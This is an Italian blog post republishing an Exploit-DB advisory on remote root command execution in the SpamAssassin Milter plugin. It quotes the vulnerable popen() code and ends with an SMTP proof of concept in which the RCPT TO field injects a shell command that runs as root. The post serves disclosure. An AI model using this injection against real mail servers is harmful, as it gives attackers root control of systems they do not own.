Apache Spamassassin Milter Plugin Remote Root Command Execution

SpamAssasin è in assoluto il metodo antispam più sfruttato dalle Web Farm mondiali in quanto si integra perfettamente con Apache ed è OpenSource.

Oggi Exploit-Db pubblica una vulnerabilità scoperta da Kingcope che permette l'esecuzione remota di codice malevolo ad insaputa dell'amministratore del sistema.

L’exploit è sfruttabile esclusivamente se è installato anche il Plugin: Spamassassin Milter che permette una personalizzazione avanzata dei filtri basi di SpamAssasin.

Il codice malevolo permette l’esecuzione di qualsiasi comando come utente root e dovrò essere inserito all’interno del campo “RCPT TO”, ovvero nel campo composto solitamente dall’indirizzo e.mail del destinatario.

Ecco infine l’exploit dettagliato:

# Title: Apache Spamassassin Milter Plugin Remote Root Command Execution
# EDB-ID: 11662
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Kingcope
# Published: 2010-03-09
# Verified: yes
# Download Exploit Code
# Download N/A

view source
Description: The Spamassassin Milter plugin suffers from a remote root command execution vulnerability. Full exploit details provided.
Author: Kingcope

Spamassassin Milter Plugin Remote Root Zeroday (BTW zerodays lurk in the
shadows not HERE)
aka the postfix_joker advisory

Logic fuckup?

March 07 2010 // if you read this 10 years later you are definetly
seeking the nice 0days!

Greetz fly out to alex,andi,adize

Apache Spamassassin
SpamAssassin is a mail filter which attempts to identify spam using
a variety of mechanisms including text analysis, Bayesian filtering,
DNS blocklists, and collaborative filtering databases.

SpamAssassin is a project of the Apache Software Foundation (ASF).

What is Postfix? It is Wietse Venema's mailer that started life at IBM
research as an alternative to the widely-used Sendmail program.
Postfix attempts to be fast, easy to administer, and secure.
The outside has a definite Sendmail-ish flavor, but the inside is
completely different.

Spamassassin Milter
A little plugin for the Sendmail Milter (Mail Filter) library
that pipes all incoming mail (including things received by rmail/UUCP)
through the SpamAssassin, a highly customizable SpamFilter.

Remote Code Execution Vulnerability

The Spamassassin Milter Plugin can be tricked into executing any command
as the root user remotely.
If spamass-milter is run with the expand flag (-x option) it runs a
popen() including the attacker supplied
recipient (RCPT TO).

>From spamass-milter-0.3.1 (-latest) Line 820:

// Gets called once for each recipient
// stores the first recipient in the spamassassin object and
// stores all addresses and the number thereof (some redundancy)

mlfi_envrcpt(SMFICTX* ctx, char** envrcpt)
 struct context *sctx = (struct context*)smfi_getpriv(ctx);
 SpamAssassin* assassin = sctx->assassin;
 FILE *p;
#if defined(__FreeBSD__)
 int rv;

 debug(D_FUNC, "mlfi_envrcpt: enter");

 if (flag_expand)
 /* open a pipe to sendmail so we can do address
expansion */

 char buf[1024];
 char *fmt="%s -bv \"%s\" 2>&1";

#if defined(HAVE_SNPRINTF)
 snprintf(buf, sizeof(buf)-1, fmt, SENDMAIL, envrcpt[0]);
 /* XXX possible buffer overflow here // is this a
joke ?! */
 sprintf(buf, fmt, SENDMAIL, envrcpt[0]);

 debug(D_RCPT, "calling %s", buf);

#if defined(__FreeBSD__) /* popen bug - see PR bin/50770 */
 rv = pthread_mutex_lock(&popen_mutex);
 if (rv)
 debug(D_ALWAYS, "Could not lock popen mutex: %
s", strerror(rv));

 p = popen(buf, "r");                [1]
 if (!p)
 debug(D_RCPT, "popen failed(%s).  Will not
expand aliases", strerror(errno));

[1] the vulnerable popen() call.

Remote Root Exploit PoC through postfix

$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: [email protected]
250 2.1.0 Ok
rcpt to: root+:"|touch /tmp/foo"
250 2.1.5 Ok

$ ls -la /tmp/foo
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo